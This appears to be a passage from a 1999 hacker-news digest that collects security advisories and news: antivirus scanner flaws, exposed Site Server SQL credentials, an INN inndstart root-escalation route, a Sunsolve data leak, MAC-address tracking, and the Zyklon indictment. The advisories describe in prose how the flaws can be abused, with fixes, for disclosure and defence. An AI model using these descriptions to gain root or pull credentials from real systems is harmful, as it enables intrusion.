NT 4.53 scans inbox but misses other inbound msgs ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Wed, 12 May 1999 09:52:59 -0500 From: Bob Duffett To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: InoculateIT 4.53 Real-Time Exchange Scanner Flawed Manufacturer: Computer Associates Product: InoculateIT for Windows NT v4.53 Build 169, Agent for Microsoft Exchange This product has a major defect. We have it running on our Exchange Server with 1,300 mailboxes yet viruses keep spreading directly from email. I did some investigating tonight and found the problem. It is ONLY scanning the Inbox folder tree. This would sound simply like a poor design but it is MUCH worse. The Inbox Rules Wizard can store the user's rules on the Exchange Server which will move a message to a specific folder without the message ever being placed in a user's inbox. This causes it to comletely by-pass the InoculateIT Real-Time Scanner. My CA rep confirmed the problem with CA support who had no work-around available at this time. Bob University of Alabama at Birmingham Cancer Center Technical Services Facility (CCTSF) mailto:Bob.Duffett@ccc.uab.edu @HWA 04.1 CA's Inoculan software vulnerabilities on NT Workstation SP3 or SP4 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Sat, 8 May 1999 14:58:08 +1000 From: Glenn Corbett To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: Insecure Bahaviour in Inoculan Client Russ, A problem has been discovered with the InocuLAN client on Windows NT workstations. If an account lockout policy is present on a Windows NT domain, large numbers of repeating account lockouts can occur. Description: Incorrect password events (event id 529) are being logged from workstations when running applications from UNC paths. The username that has logged the incorrect password is different to that of the logged on user. Configuration: Windows NT workstation SP3 or SP4, with InocuLAN V4.0(373) or InocuLAN V4.0(375) To reproduce the problem: 1. Install InocuLAN V4.0(373) or V4.0(375) onto an NT workstation with SP3 or SP4 (SP5 not tested yet) 2. Configure InocuLAN as described below: Options: Direction - Incoming and Outgoing files Action upon Virus detection - Cure File Cure Action for Macro Viruses - Remove Infected Macros Copy File before Cure Rename File when Cure Fails Rename Extension - AVB Move Directory - C:\Inoculan\VIRUS Protected Areas: Protect Floppy Drives Protect Network Drives Protect CD-ROM Drives Scan Type - Secure Scan 3. Reboot the workstation 4. Log into WorkstationA as Domain UserA, Logout Domain UserA 5. From another workstation change the password of Domain UserA 6. Log into WorkstationA as Domain UserB. 7. From WorkstationA run an application from a remote share on WorkstationX where Logon and Logoff, Success/Failure, are being audited. Run an application from the cmd window using a UNC path with no other connections to the WorkstationX. Eg \\WorkstationX\shareX\notepad 8. The application will take several seconds to run and there will be a failure security event (529) for UserA from Workstation A. From server manager remotely stop the Cheyenne InocuLAN Anti-Virus Server on Workstation A and repeat step 7. You will see that the application will start immediately and no errors will be recorded in the security event log. The above problem also causes problems when running logon scripts. If an application is called from the logon script and that application does not exit on the local workstation, the version in the logon share will be run. As soon as the application in the logon script is called there is an event 529 error recorded on the logon server security event log. Even if subsequent different users log into Workstation A, these problem will continue until the workstation is rebooted. This behaviour can also been seen if in Step 4, a local userA logs on. The subsequent error 529's have the local userA account in the security event. It appears as though InocuLAN is storing the user credentials for the first logged on user and using them to scan network drives for virus' even when a different user subsequently logs on until workstation reboot. It is not yet apparent if this username / password is being stored in the registry / temporary file or memory, and therefore open to exploit. We do not see this problem with InocuLAN V4.0 (4.0 Service Pack 1). CA Have been notified earlier this week, no respose as yet. Thanks Glenn Corbett CRISP Project Server / Workstation Team Leader Compaq Computer Corp, Australia. Glenn.Corbett@compaq.com (Work) Glenn.Corbett@bigpond.com (Private) -------------------------------------------------------------------------------- Date: Fri, 14 May 1999 14:49:17 -0400 From: ARCNT To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM Subject: FW: NTBUGTRAQ response - URGENT The issue reported to NTBUGTRAQ regarding InocuLAN v4.0 build 373 and 375 implies that username/password information is stored "somewhere" on the client side and as such could potentially be exploited. That assertion is inaccurate, the username/password credential combination is NOT stored on the client side by Inoculan, (which is why the efforts to locate these credentials in shared memory, in a file or in the registry have been unsuccessful). Clearly, in order for the InocuLAN real-time scanner to access files on a remote server, the software must have valid security contexts in place to permit the requisite access to the file systems and files. The techniques utilized by Inoculan (using low level, but fully documented and supported standard vendor API's) do NOT require that traditional user credentials (user account/ password) be presented in order to gain the necessary access. Rather, Inoculan is able to gain the required access in a completely secure manner without prompting for username and password information. In addition, it is important to point out that NO attempt to retrieve credential data is done without the user's explicit advance knowledge and consent. Computation/generation of the requisite credential information is done at Inoculan driver initialization time, and can be easily refreshed by simply rebooting the machine (which of course will in turn result in Inoculan initialization routines being invoked as part of system restart). The particular behaviour observed and reported can be attributed to the fact that AFTER Inoculan initialization was completed, the user access credentials for the user in question were modified, rendering the originally computed credential that Inoculan would otherwise utilize, invalid. An enhancement is being developed presently to provide a configuration setting that will instruct the Inoculan real-time scanner to recompute credentials automatically thus eliminating the need to reboot the client machine. This enhancement will be available by 17:00 Eastern US time, May 21, 1999, and can be downloaded from the standard Computer Associates support web sites, (http://support.cai.com). We appreciate the efforts involved in bringing this issue to our attention and look forward to being able to provide you continued responsive service in the future ! InocuLAN Technical Support @HWA 05.0 [ISN] Everywhere your MAC address shows up ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 11 May 1999 21:55:22 -0600 (MDT) From: cult hero To: InfoSec News Subject: [ISN] Everywhere your MAC address shows up Forwarded From: MICROSOFT'S HEAVY HAND IN THE COOKIE JAR A special report from YEOW - Barry Simon. See the Woody's Office Watch discussion and details on the Office 97 privacy problem. Issues 4.11 and 4.12 Because of the important Internet Explorer 5 coverage some regular WWW features have been held over to the next issue. We reported earlier on the brouhaha over the inclusion of hardware IDs in the Pentium III chip and privacy advocates' concerns about it. Turns out many of us already have hardware IDs on our systems since all Ethernet cards have a MAC (stands for 'Media Access Control', whatever that means!), a six byte ID number that networks need to be sure to properly direct network packets. Of course, the Pentium III ID's are more serious since many home systems don't (yet) have network cards and the biggest privacy concerns are in the consumer space. Due to wonderful sleuthing by Richard Smith of PharLap (who earlier located the April Fool's Bug discussed in WWW issue 2.2), the world has discovered a number of places that Microsoft has been using these MACs - in Windows 98 IDs, in Office 97 documents and in the microsoft.com cookies. And privacy concerns result from all these uses. To understand the issues, try a few experiments. First, you'll need your MAC assuming you have an Ethernet adapter. With Windows 9x, run the program winipcfg from the Run box. It should load with a dropdown that says 'PPP Adapter'. Change the dropdown to the name of your hardware adapter. The Adapter Address field will say something like 00-70-06-9A-8E-43. That's your MAC. Each byte is presented as two hex digits (0 through 9 or A-F) for a 12 character ASCII string which is what Microsoft uses. With Windows NT, run instead winmsd, go to the Network tab and pick Transports and you'll get the MAC. For the next experiment, you'll need to look at a Word 97 document in text mode. You can't do this with Word. If you have Quick View Plus (plain Quick View won't do), open a Word doc in QVP, go to the View menu and pick View as Text. Or make a small Word doc, save it and rename it to a .txt extension and open it in Notepad. Now search for the string PID. You should find _PID_ GUID and shortly afterwards, a long hex string inside braces such as {F96EB3B9-C9F1-11D2-95EB-0060089BB2DA}. Those 12 hex digits at the end will be your MAC. Yup, every Word doc, every Excel spreadsheet and every Power Point presentation is branded with an identifier showing the PC it came from. If your boss has a Word memo you sent her and a copy of the anonymous whistle blowing attachment you sent to the Feds, she could determine they were made on the same machine. (Of course, if you aren't careful, the document includes an author name and if any corrections were made, it may say who made the corrections. Within the next few days, Microsoft expects to post a white paper on all the 'metadata'; embedded in Office documents). To run the next experiments, you'll need Windows 98, so I'll tell you what happens so you can follow along in any event. In your Windows directory, you'll find a file called reginfo.txt. Open it in Notepad and look for a line called HWID; it ends with your MAC. This file is created when you install Windows and is transmitted to Microsoft when you register. And here's the clincher: even if you check the box not to send hardware information, this data is sent. And it's even worse - the data collection code is in an ActiveX control that can be used by any Internet site out there. Pharlap has a demo to illustrate this: go there and it displays your MAC on screen. Any site knowing of this control could track MACs of all Windows 98 visitors to their sites. There is also a demo and discussion at Windows Magazine. By the way, this ActiveX control is also in the Windows 2000 beta so if Microsoft hadn't been found out, NT users would have been hit next. Next, go to your cookies directory and open the text file whose name ends with microsoft.txt (it probably has a username@ in front where username is your login name). In it you'll find a string called GUID that includes your MAC (GUID, by the way, is short for Global Unique Identifier). This cookie is sent to www.microsoft.com every time you visit that site. You may have realized they were making a cookie when you registered at their site but I bet you didn't realize they were adding hardware information without your permission. (Actually the Win98 Registration Wizard made the cookie before you went to the Microsoft site.) You might want to search your Registry for your MAC as a string. I found mine numerous times - two in suspicious places viz a viz Microsoft. It's part of a key for Media Player called Client ID (is this passed on to the Media Player servers?) and as part of a key HKCU\Identities that seems to be connected with Outlook Express 5.0. There is certainly plenty here for the paranoid. Microsoft is collecting and storing in its databases unique hardware information. That information brands your documents, and is always sent on when you access Microsoft's site. One has to consider the possibility that Microsoft is keeping some master database tracking all sorts of interactions based on your MAC. And one has to allow the possibility that the MAC will be encoded in the information that is sent by the Office Registration Wizard in Office 2000. Microsoft has reacted vigorously to the developments in this story. They have two customer letters ( here and here) on their site in which they promise to remove the hardware ID part of the registration wizard in a Win98 upgrade. They also promise to delete 'any hardware ID information that may have been inadvertently gathered without the customer having chosen to provide Microsoft with this information.' Tools have already been posted to remove branding from Office applications and from already-created docs and there is a promise that branding will be removed >from the final version of Office 2000. Beyond these actions, there has been a full court spin operation. Some MS representatives have (unwisely in my opinion) attempted to minimize the issue. There have been claims that the doc branding was a part of a feature, never implement, intended solely to help network administrators. There has been harping on the fact that the MAC only identifies a machine but not an individual - true but not of much comfort in many cases. We've been told that Windows 98 sending a HWID even if you said not to send hardware information was a bug, not a feature - an inadvertent programming error. There's been no new statement about the use of MACs in cookies which I find most disturbing. We've been told by Microsoft representatives that the Office 2000 Registration Wizard doesn't collect MACs or anything like a MAC. Indeed, they claim that while the Office CD serial number can be reconstructed >from the 16 byte code sent by the wizard, the hardware info does not allow reconstruction. In particular, if the different CDs were used on the same machine, they'd be unable to tell that the codes came from the same machine. _____ The problem with the Microsoft position is that the company has so little credibility and there is too much of a pattern here. We pride ourselves on taking a middle road on Microsoft at Woody's newsletters. We don't hesitate to put their feet to the fire but, on the other hand, we don't take the position that Microsoft is the root of all evil and everything they say and do is two faced. That said, Woody's middle name isn't Polly and mine isn't Anna. Microsoft has amply demonstrated that it is company policy to, er, shade the truth when doing so serves a perceived business purpose. We see it in the leaked disinformation about Windows 2000 shipping this fall, we've seen it in their previous reactions to accusations and we saw it too often in the testimony at the DOJ trial. That means one has to take skeptically every statement that Microsoft has made about the MAC problem. I'm inclined to believe that branding of Office documents wasn't part of a plot to link together our entire lives in Microsoft's databases. But I'm insulted that they try to bat their eyelashes and claim to us that the sending of the HWID even when you told them not to send hardware info was an inadvertent error. And I'm concerned that we have no way of knowing that they've kept their promise to remove hardware IDs from their internal databases. Indeed, my presumption is that they will not. I worry that Microsoft is tucking all sorts of things into the holes they aren't discussing. While they have said they'll stop using HWID, they have also said they'll continue to use the MSID number which is created by the Windows 98 Registration wizard. And, guess what? As discovered by Peter Siering at the German publication C'T Magazine, the registration wizard also creates a Microsoft cookie that includes MSID. So even after the apologies and changes, it seems Microsoft will be quite capable of tracking us and linking online visits to registration information. It's interesting about credibility. There was also an Intel slip reported recently that they claimed was inadvertent. Apparently some mobile Pentium II's shipped with hardware IDs even though these were only announced for Pentium III's. Intel's explanation is that they experimented with this feature in the manufacturing process for the mobile Pentium II but it was supposed to be disabled before shipping. One line inadvertently didn't do the disabling. Intel's credibility is such that I'm willing to accept their claim of inadvertence here. -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 06.0 [ALERT] Site Server 3.0 May Expose SQL IDs and PSWs ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 11 May 1999 16:27:38 -0600 From: Mark To: BUGTRAQ@netspace.org Subject: [ALERT] Site Server 3.0 May Expose SQL IDs and PSWs ==================================================== Site Server's AdSamples Directory Reveals ID and PSW Discovered by Andrey Kruchkov ==================================================== VERSIONS EFFECTED * Tested on Microsoft Site Server 3.0 Commerce Edition DESCRIPTION Site Server allows the installation of an AdSamples directory, which serves to demonstrate the capabilities of the Ad Server component. If this directory is installed and left open to the public without limiting directory permissions, a user can obtain a site configuration file (SITE.CSC) that contains sensitive information pertaining to an SQL database. This information could contain a DSN, as well as a a username and password used by the Ad Server to access the SQL server database. COMMENTS Andrey reported this problem to NTSECURITY.NET and has informed Microsoft of this issue. Andrey points out an easy way to eliminate this risk: Remove the "AdSamples" virtual directory from the DEFAULT root Web site, or change security permissions for this folder to sufficiently restrict access. If you must provide loose access to this virtual directory for some strange reason, then you should at least adjust the security permissions for the SITE.CSC file so that it's not available for viewing. Also keep in mind that there may be numerous other SITE.CSC files under your Site Server installation, all of which need to be secured. For a URL that demonstrates the problem, please visit http://www.ntsecurity.net/scripts/loader.asp?iD=/security/siteserver-2.htm This is probably a great time to remind people once again to NEVER install sample content on production servers and to NEVER use the built-in IIS DEFAULT Web site without first thoroughly investigating the implications of doing so. Thanks, Mark - http://www.ntsecurity.net @HWA 07.0 inndstart vulnerability, possible root compromise ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 11 May 1999 11:24:06 -0400 From: Forrest J. Cavalier III Reply-To: userkt-l@mibsoftware.com To: BUGTRAQ@netspace.org Subject: INN 2.0 and higher. Root compromise potential Copyright 1999 Forrest J. Cavalier III, Mib Software This information is provided by Mib Software, www.mibsoftware.com. This notice can be distributed without limitation. Summary: -------- INN is open source NNTP (Usenet) server software from the Internet Software Consortium. http://www.isc.org/ In some cases, there is potential for the local news user, or any local user, to execute arbitrary code as root. The two vulnerabilities reported below have already been discussed in the Usenet newsgroup news.software.nntp. Therefore, the vendor is being sent this notice now, and was not notified previously. INN is communications software. Mib Software knows of no buffer overrun exploits of the affected versions of INN, but the possibility cannot be ruled out. This would be the only way a root compromise using a remote connection would be possible. Background: ----------- Since NNTP defines a privileged port (119), a SUID root wrapper, inndstart, binds to the port, and then is intended to drop root privileges, setting the UID to user news before exec() innd. In some cases, this behavior can be altered to gain privileges. ------------------------------------------------------------ Vulnerability 1 (pathrun should not be trusted information) ------------------------------------------------------------ Summary: It is possible for the news user to control the behavior of the inndstart program so that root privileges are not dropped, and execute arbitrary programs as root. Versions affected: INN 2.0 and higher. Versions not affected: INN 1.7.2 and lower. Details: inndstart determines the target UID and GID from the UID and GID of a directory which is normally owned by user news, group news. The directory which is checked can be changed be editing the "pathrun" parameter in the inn.conf configuration file. By specifying a directory with appropriate ownership, inndstart can exec() running as any user, including root. During the course of normal operation, innd forks() and executes many child processes, and it is relatively simple to run arbitrary code from innd. Solution: modify the source file innd/inndstart.c to use a hard coded pathrun, instead of the structure member innconf->pathrun. Workaround: There is no workaround. The source must be modified. ------------------------------------------------------------------ Vulnerability 2 (inndstart should be protected, INNCONF environment variable should not be trusted.) ------------------------------------------------------------------ Versions affected: INN 2.x after July 9, 1998 (including INN 2.1 and higher.) Versions not affected: INN 1.7.2 and lower. Details: Normally, the SUID root program inndstart, should be in a directory accessible only by user news. In some installations, this program is accessible to all local users. On July 9, 1998 a source code change was introduced which obtains the path of the configuration file from the environment variable INNCONF. In those installations with inndstart accessible to local users, a local user can set INNCONF in the environment and determine the behavior of inndstart so that abitrary programs are executed. If the pathrun vulnerability above is fixed, these programs run as user news, if not fixed, they run as user root. Solution: Install inndstart in a directory with 0700 permissions owned by user news. ------------------------------------------------------------------- Forrest J. Cavalier III, Mib Software, INN customization and consulting 'Pay-as-you-go' commercial support for INN: Only $64/hour! Searchable hypertext INN docs, FAQ, RFCs, etc: 650+ pages. http://www.mibsoftware.com/innsup.htm @HWA 08.0 Sunsolve.Database leaks crucial info about itself and its users ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Tue, 11 May 1999 19:22:59 +0100 From: "Robson, Ken" To: BUGTRAQ@netspace.org Subject: Sun Microsystems Leaks extensive Amounts of Information About Itself & It's Customers Through Its Sunsolve Database... Hi Folks, I have just been scouring Sun's Bug Reports for some information and I discovered that you can easily trawl for useful information about both Sun and its clients. Information exposed includes:- * Copies of /etc/passwd (i.e. user names) * Copies of /etc/shadow (i.e. encrypted passwords) * Configuration of network services (i.e. inetd.conf) It is trivial to put together searches that glean this for some of their customers. Whilst the contract services restrictions are in place for accessing these accounts, logins must be in wide circulation. I know 3 or 4 accounts from various past employers myself. When logging a support call I do not often consider what might happen to the call notes. I am sure that Sun are not the only company doing this and this is not aimed at Sun in particular, they are just an example. Serious consideration should be given to what information you are prepared to pass to those who support you - do you trust the rest of their customers (at best) or the entire internet (at worst). Anyway not earth shattering but food for thought. Regards, Ken. PS - Please do not interpret the domain that this mail comes from as any indication that I work for the European Bank for Reconstruction & Development. I in fact contract to Hewlett Packard and am simply based at the bank - all the opinions expressed above are my own and have nothing to do with either of these organisations. ----------------------------------------------------------------------------- Date: Wed, 12 May 1999 09:56:00 -0700 From: Alan Coopersmith To: BUGTRAQ@netspace.org Subject: Re: Sun Microsystems Leaks extensive Amounts of Information About Itself & It's Customers Through Its Sunsolve Database > When logging a support call I do not often consider what might happen to the > call notes. I am sure that Sun are not the only company doing this and this > is not aimed at Sun in particular, they are just an example. Serious > consideration should be given to what information you are prepared to pass > to those who support you - do you trust the rest of their customers (at > best) or the entire internet (at worst). The actual service order notes are not available to customers through SunSolve - but parts of bug reports that may be generated by them are. At least a few years ago when I worked in SunService they reminded us not to put customer information in the public part of bug reports, but there was no review system to make sure we didn't screw up. If you want to protect yourself, make sure that if your call results in a bug report you go to SunSolve and review the public copy to make sure there's nothing in there you wouldn't want others to see and if there is, call up your service rep and make them move it to the sun-internal-access-only section of the bug report. Disclaimer: I no longer work in Tech Support at Sun and do not and cannot speak for SunService or whatever they're called after the latest "realignment of the Sun planets". -- ________________________________________________________________________ Alan Coopersmith alanc@godzilla.EECS.Berkeley.EDU Univ. of California at Berkeley http://soar.Berkeley.EDU/~alanc/ aka: alanc@{CSUA,OCF,CS,BMRC,EECS,ucsee.eecs,cory.eecs}.Berkeley.EDU @HWA 09.0 [ISN] Asia is wide open to virus, hacker attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Forwarded From: William Knowles http://www.feer.com/Restricted/99may_20/tech.html (Feer.com) [5.20.99] How personal are personal computers? At the rate Asian companies and individuals are exposing their computers to on-line infection and intrusion, they may as well drop the "P" from PC. The information highways are proving very public, but many Asians are travelling naked and defenceless. Computer viruses are the region's biggest problem. Two major virus attacks in March and April crippled hundreds of thousands of Asia's computers. Then in late April, the Singapore government was caught snooping into PCs without seeking permission from their owners. The incidents have highlighted the need to protect PCs from viruses and unwanted intruders--protection that's sorely lacking in the region. While multinational companies now keep a constant vigil on the security of their computer networks, many other companies and individuals have left themselves vulnerable. To protect against viruses, they need to install and diligently update antivirus software, which costs an average of $50 per program for personal use. Large companies have for many years installed virtual "firewalls" that combine antivirus, antihacking and other protective software, but antihacking and personal-data security programs are only just becoming commercially available to individual PC users. The latest virus hit more than 650,000 computers in Asia. Named Chernobyl, it remained dormant until April 26, the 13th anniversary of the Chernobyl nuclear-plant disaster in Ukraine. On that day, the virus disabled computers, destroyed programs and erased large amounts of stored information. Xinhua news agency reported that 360,000 PCs were affected in China. The virus's Taiwanese creator, 24-year-old Chen Ing-hau, said he had wanted to cause mayhem on the mainland. Chen was arrested but released without charge due to a lack of plaintiffs in Taiwan, where no infections were reported. "Chernobyl's been known about and treatable for over a year and still people were caught out," says Daniel Schneersohn, Hong Kong-based regional director for Symantec, an American maker of antivirus software. He says many customers had such software installed, but had simply not activated it. Half of the damaged PCs in China, for instance, had protective software that was not turned on. Although most corporate PCs shipped to South Korea since 1997 contain antivirus software, Chernobyl infected an estimated 250,000 PCs in that country. Many companies allow their employees to turn off antivirus software, which can slow down the computer while it monitors infections. Many users had failed to keep installed software up-to-date. "It's not enough to buy antivirus software and install it or even activate it," says Schneersohn. "You've got to update the software--the antivirus companies update the virus threat lists every week." Eric Sheridan, director of Asia business development for U.S. computer-systems company Corporate Software & Technology, says most of his customers, almost all multinationals, escaped Chernobyl unscathed. "Our customers all have ongoing contracts for security and virus protection, or they have good in-house teams at work," he explains. Most at risk are individual PC users and companies with less sophisticated information-technology departments, Sheridan says, especially as they make increasing use of the Internet. "Once you have a few offices up and on-line you have to take outside threats like viruses and hacking seriously." Schneersohn agrees that while multinational firms are taking these threats seriously, the rest of the Asia-Pacific isn't. "Even some big listed companies in Hong Kong don't use antivirus protection," he says. Smaller businesses in particular have turned to pirated antivirus programs during the economic crisis to keep costs down. But they lose the advantages of software support and advice, says Schneersohn. "It's software use at its lowest level and that's why the highest level of infections are in small businesses and homes" where pirated programs are most prevalent. Still, even pirated-software users could have protected themselves by downloading updates of antivirus programs from the manufacturer's Web site. For now, most software companies don't bother to trace pirates who download updates, says Schneersohn--although Symantec's next generation of antivirus software will update only registered users. Just as the dust settled from the Chernobyl attack, Internet users in Singapore were faced with a more organized affront to their computer privacy. SingNet, an Internet service provider, acknowledged that it asked the Home Affairs Ministry's IT security unit to scan its customers' PCs for viruses without their consent. SingNet is owned by Singapore Telecom, which is in turn 80%-owned by the government. SingNet's actions only came to light because a student, who had downloaded antihacker software from the Internet onto her PC, traced the scan back to the ministry. SingNet's home page on the Web apologizes for the intrusion--"We should have informed you first," it says--and invites visitors to voluntarily submit to the virus search instead. The company says the scanning did not "enter" any PCs nor unveil any personal data. Also, SingNet claims it found 900 PCs infected with "trojan horse" viruses that allow hackers to enter computers via the Internet and take almost complete control. The SingNet action and the discovery of the "trojan horse" viruses highlight the ease with which PCs can be snooped on while on-line. "If breaking in is so easy, some less scrupulous companies may well start thinking that it might be worth throwing a few bucks at some kid to look into their competitors' files," says Schneersohn. For personal and small-business users, encryption is one option for protecting confidential data from hackers. But use of encryption is either illegal or legally untested in many Asian countries. A second option is to remove confidential data to a separate disk drive and access it only when the user is off-line. To protect stored data while the user is on-line, demand will probably grow among personal and small-business PC owners for simpler versions of the "firewalls" that large companies use to protect their computer networks from intrusion. Schneersohn says antivirus software makers are already looking into the market. "Many people want to block access to personal files to all third parties--you could call it a personal firewall. They simply want to regain control of what's happening on their computers." -o- Subscribe: mail majordomo@repsec.com with "subscribe isn". Today's ISN Sponsor: Hacker News Network [www.hackernews.com] @HWA 10.0 More on Zyklon's legal troubles ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ Zyklon Busted contributed by Space Rogue HNN first reported this news early Friday morning and has now learned more details. Zyklon, (Eric Burns) has now been charged with three counts of unlawful computer intrusion. The counts are believed to be for alleged attacks on the USIA (US Information Agency) web site, which as hosted by Electric Press in Herndon, Va. Other companies allegedly attacked where LaserNet in Fairfax, Va.; and Issue Dynamic Inc., which also has machines in VA. The total damage estimates are listed as $15,000. (Which seem a little low compared to other similar cases) It is believed that the Secret Service will also question Zyklon in connection to any involvement he may or may not have had in the recent whitehouse.gov crack. Copy of the Indictment http://www.hackernews.com/orig/zyklon.html MSNBC http://www.msnbc.com/news/269584.asp ABC News http://abcnews.go.com/sections/tech/DailyNews/whitehousehacker990515.html IN THE UNITED STATES DISTRICT COURT FOR THE EASTERN DISTRICT OF VIRGINIA Alexandria Division UNITED STATES OF AMERICA ) ) v. ) Criminal No. ) ) Counts 1-3: Computer Intrusion ERIC BURNS ) (18 U.S.C. $ 1030(a)(5) also known as "Zyklon" ) ) Defendant. ) INDICTMENT May 1999 Term - At Alexandria, Virginia COUNT 1 THE GRAND JURY CHARGES THAT: From on or about August 25, 1998, through on or about January 22, 1998, in the Eastern District of Virginia and elsewhere, ERIC BRUNS, also known as "Zyklon," defendant herein, knowingly and intentionally cuased transmissions from a computer in Shoreline, Washington, of progress, information, codes, and commands, and as a result of such conduct, intentionally caused damage without authorization to a computer of Electric Press, Kerndon, Virginia, which was a protected computer used by and for the United States Information Agency, and agency of the United States Government, and the conduct affected the use of the computer by and for the government and caused loss aggregating at least $5,000 to at least one individual between August 25, 1998 and March 1, 1999. (In violation of Title 18, United States Code, Section 1030(a)(5)(A).) COUNT 2 THE GRAND JURY CHARGES THAT: From on or about December 28, 1998, through on or about December 31, 1998, in the Eastern District of Virginia and elsewhere, ERIC BURNS, also know as "Zyklon," the defendant herein, knowingly and intentionally caused transmissions from a computer in Shoreline, Washington, of programs, information, codes, and commands, and as a result of such conduct, intentionally caused damage without authorization to a computer of Computer Tech Services, doing business as LaserNet, in Fairfax, Virginia, which was a protected computer used in interstate commerce and communication, and caused loss aggragating at least $5,000 to at least one individual between December 28, 1998, and March 1, 1999. (In violation of Title 18, United States Code, Section 1030(a)(5)(A).) COUNT 3 THE GRAND JURY CHARGES THAT: From on or about December 28, 1998, through on or about January 11, 1999, in the Eastern District of Virginia and elsewhere, ERIC BURNS, also known as "Zyklon," defendant herein, knowingly and intentionally caused the transmission from a computer in Shoreline, Washington, of programs, information, codes, and commands, and as a result of such conduct, intentionally caused damage without authorization to computers operated by Issue Dynamics, Inc. in Alexandria, Virginia, and Washington, D.C., which were protected computers used in interstate commerce and communications, and caused loss aggragating at least $5,000 to at least one individual between December 28, 1998, and March 1, 1999. (In violation of Title 18, United States Code, Section 1030(a)(5)(A).) A TRUE BILL: __________________________ FOREPERSON UNITED STATES GRAND JURY (signed) ______________________ Helen F. Fahey United States Attorney (signed) ______________________ Justin W. Williams Assistant United States Attorney Chief, Criminal Division (signed) ______________________ Jack Henly Assistant United States Attorney Alleged USIA site hacker indicted Grand jury hands down three counts of computer intrusion against ‘Zyklon’ By Brock N. Meeks MSNBC May 14 A federal grand jury in Virginia Thursday charged a Washington state man, Eric Burns, with three counts of computer break-ins, including two high-profile hacks of the United States Information Agency. Burns, well-known in the electronic underground by his code name Zyklon, has also been questioned by the Secret Service in conjunction with other government site break-ins, MSNBC has learned. BURNS’ CODE NAME, MENTIONED in court papers, taken from the poison gas used by the Nazis in concentration camps, was mentioned on the recent hack of the White House Web site in a shout out (hacker slang for words of praise for a fellow hacker). However, no details were available as to whether Burns was being questioned by the Secret Service in conjunction with the White House hack. One source told MSNBC, after speaking with Burns, that the Secret Service questioned him about other government sites but not the White House hack.The Secret Service declined to comment. However, a source familiar with the investigation, which was carried out by the Computer Crimes Division of the Federal Bureau of Investigation, confirmed that the bureau acknowledged another agency is also investigating Burns. Calls to the FBI to discuss their investigation of Burns were not returned. The three alleged break-ins charged to Burns took place from August of last year to January, according to court papers. Attempts to contact Burns, who lives in Shoreline, Wash., by phone, were unsuccessful. One source who spoke to Burns said he was on a plane and heading for a court appearance in Virginia on Monday. The three counts in the indictment are for attacks on the computers of Electric Press in Herndon, Va., which hosts the USIA Web site; LaserNet in Fairfax, Va.; and Issue Dynamic Inc., which has computers in Alexandria, Va., and Washington, D.C. Each count mentions damages of at least $5,000. The attack on USIA’s web site in January was particularly damaging and was the second time it had been allegedly hacked by Burns. Each of those hacks was signed by Zyklon. USIA, which operates the Voice of America broadcasts, is an extremely busy site; it’s a clearinghouse for U.S. information and heavily used by foreigners. The first USIA hack, which occurred in August, destroyed a lot of the site’s data, according to published reports at the time. The second break-in seemed to be Burns’ way of working out his frustrations owing to a lost love. Hack by Zyklon. Crystal, I love, (you?) the hacked site said. In another Zyklon hacked site, this one of BellSouth, he laments that he has massive depression, that he’s a loser and that because of it I will never have my Crystal I will never be happy and I hope I goto [sic] prison and die. Another hack attributed to Zyklon is that of the official Chinese human rights page, as seen on the Hacker News Network, which mirrors the hacked site. This hack appears to be an act of so-called hacktivism in which hackers break into systems, own them and put up politically charged speech. -=- ABC news; Teen Hacker Indicted ‘Zyklon’ Not Charged in White House Attack By Ted Bridis The Associated Press W A S H I N G T O N, May 15 A teen-ager identified as a computer hacker whose name appeared on the Internet site for the White House after vandals altered it this week has been indicted in Virginia on charges he broke into another government computer. A grand jury indicted Eric Burns, 19, on three counts of computer intrusion. Burns, reportedly known on the Internet as Zyklon, was accused of breaking into a computer between August 1998 and January 1999 in northern Virginia that is used by the U.S. Information Agency. Zyklon was one of a dozen names listed on the hacked version of the White House Web site, which was altered overnight Sunday for a few minutes before government computers automatically detected the intrusion. ‘A Serious Effort’ The indictment returned Thursday also accuses Burns of breaking into two other computers, one owned by LaserNet of Fairfax, Va., and the other by Issue Dynamics of Washington. Sam Simon of Issue Dynamics said he was cooperating with the FBI. We firmly believe that computer criminals need to be identified, prosecuted and caught, and we’re pleased that the FBI is not treating this as a minor matter. It wasn’t an insignificant incident. It was a very concentrated, serious effort over a period of time. Burns was not charged in the attack on the White House computers.The opening page of the White House site was altered briefly to show a black Web page with the names of the hacker organizations claiming responsibility, along with messages, Your box was own3d and Stop all the war. The page also included the phrase, following peeps get some shouts, and listed a dozen names, including Zyklon. @HWA 11.0 IRC war and a Police HQ bomb threat send two headed for trouble.. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ CallerID Fooled In Omaha contributed by hantai A bomb threat was called in to the Omaha police headquarters recently. The Police responded to the address reported by CallerID. While the police where at that address another bomb threat was called in from the same number. US West says that there are some "technical pieces of equipment" the criminals could use to make a phone call appear to come from someones number without actually being at that phone. (Yeah, it's called a butt set and telephone can on a street corner, real technical. Oh, and most of those cans aren't even locked) HNN has received reports that the perpetrators of this prank are known as 'port' and 'rottenboy' on IRC and did this in retaliation for not being opped on an IRC channel. Omaha NBC Affiliate Channel 6 http://www.discoveromaha.com/partners/wowt/news/1999/05/phone_threat_14.html Police investigate mystery A threatening phone call has led police to a mystery and so far the clues have turned up nothing more 